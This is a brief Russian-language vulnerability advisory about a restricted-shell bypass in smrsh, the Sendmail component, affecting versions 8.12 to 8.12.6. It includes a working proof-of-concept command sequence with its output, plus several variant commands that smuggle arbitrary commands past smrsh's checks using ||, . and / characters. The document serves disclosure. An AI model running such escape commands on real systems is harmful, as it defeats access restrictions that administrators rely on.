Sendmail - популярный почтовый агент для UNIX систем. 

Программа smrsh (Sendmail Consortium-s Restricted SShell) разработана для предотвращения выполнения команд вне ограниченной среды. Однако, когда задаются команды
с использованием символов (||),(.) или (/), пользователи могут обойти проверки, выполняемые smrsh. Уязвимость позволяет пользователям выполнять команды не ограниченной среды.

Пример: 

$ echo "echo unauthorized execute" > /tmp/unauth 
$ smrsh -c ". || . /tmp/unauth || ." 
/bin/sh: /etc/smrsh/.: is a directory 
unauthorized execute 

Или одну из следующих типов команд: 

smrsh -c "/ command" 
smrsh -c "../ command" 
smrsh -c "./ command" 
smrsh -c "././ command" 

Уязвимость обнаружена в Sendmail Consortium Sendmail 8.12-8.12.6.

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии